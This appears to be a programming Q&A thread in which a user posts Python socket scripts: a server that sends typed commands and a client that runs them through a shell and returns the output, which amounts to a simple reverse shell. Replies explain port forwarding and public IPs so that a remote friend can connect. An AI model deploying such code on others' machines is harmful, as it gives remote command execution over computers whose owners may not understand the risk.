# How to connect a "client" socket on any network in the world to my "socket server"

Tags: python, sockets

I made a socket to see how it works.

Basically my intention for testing was to run commands in client computer cmd

First I made the  `server`  to receive a connection from my other script `client`

```
import socket

HOST = '192.168.100.xx'  #my computer ipv4
PORT = 50000

server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind((HOST,PORT))
server.listen(5)
print('Server waiting connection...')
conn,addr = server.accept()
print('Connection established!')
print('Connected in addr: {}\n'.format(addr))

while True:
    cmd = str(input('command>'))
    conn.send(str.encode(cmd))
    response = str(conn.recv(1024),"utf-8")
    print(response)
    if cmd == 'quit':
        break

server.close()
```

Then I made the client:

```
import socket
import subprocess
import os

HOST = '192.168.100.xx' #ipv4 from my computer (server)
PORT = 50000

client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client.connect((HOST,PORT))
print('Connecting to the server {}'.format(HOST))
while True:
    command = client.recv(1024).decode()

    print('Server command>'+command)
    cmd = subprocess.Popen(args=command,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    output = (cmd.stdout.read() + cmd.stderr.read()).decode("utf-8", errors="ignore")
    client.send(str.encode(str(output)+ str(os.getcwd()) +'$'))
```

Here's how I get my IPv4 address:
[image]

Initially when I tested it on a machine on my network this worked fine, but when I sent the `client` to a friend far away to run it, it didn't work.

I would like to know what I do to be able to use my  `socket server`  to connect with `socket client` in any corner of the world.

Comment: You need to configure port forwarding on your router, and he needs to connect to the router's public IP.

Comment: how can i do it ?

Comment: Google "port forwarding". This isn't a programming question. You'll almost certainly be able to find answers at [su].

Comment: Might be easier/more secure to use a service like [ngrok](https://ngrok.com/)

Comment: Do not bind your server to a local ip address if you want the server to be reached from internet. Do not bind at all. Just open the port.

Answer (score 0):

You are using a local ip which allows people connected only to your router connect.
So you need to use your public ip address. [(Click Here to check your IP)](https://www.google.com/search?q=what+is+my+ip&rlz=1C1OPNX_enIN978IN978&oq=what+is+my+ip&aqs=chrome..69i57j0i67l2j0i512l7.1786j0j7&sourceid=chrome&ie=UTF-8)

Open a port in your router. for example: `1234`.

Dont know how? See [this](https://www.youtube.com/watch?v=aQXJ7sLSz14) video.
Want to learn about it? See [this](https://www.youtube.com/watch?v=jfSLxs40sIw) video.

Once you do that, change the port in your code to the port you opened on the router page.

and then change the ip in the client code to your public ip.

Now your friend should be able to connect to your server.

(also you need to have static ip and not dynamic ip)